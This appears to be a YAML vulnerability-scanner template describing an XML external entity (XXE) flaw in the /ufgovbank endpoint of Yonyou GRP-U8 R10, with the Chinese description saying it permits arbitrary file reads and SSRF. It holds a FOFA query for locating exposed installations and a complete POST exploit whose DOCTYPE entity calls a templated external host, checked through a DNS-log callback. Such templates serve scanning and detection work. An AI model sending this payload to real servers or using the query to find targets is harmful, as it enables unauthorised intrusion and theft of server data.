product: 用友GRP-U8
vName: 用友GRP-U8 ufgovbank.class XML外部实体注入
type: 外部实体注入
vID: [ ]
level: 3
vDesc: 用友GRP-U8 R10 ufgovbank.class 存在XML实体注入漏洞，攻击者可利用xxe漏洞获取服务器敏感数据，可读取任意文件以及ssrf攻击，存在一定的安全隐患。
version: ''
note: ''
search:
  FOFA: app="用友-GRP-U8"
protocol: http
link: https://blog.csdn.net/qq_36618918/article/details/135462664
fix:
  - 建议联系软件厂商进行处理。
model: dnslog
logic: and
exploit:
  - exp:
      method: post
      follow: false
      path: /ufgovbank
      data: reqData=<?xml version="1.0"?> <!DOCTYPE foo SYSTEM "http://{{m:rep}}">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest
    verify:
      path: ''
      logic: and
      check:
        - model: dnslog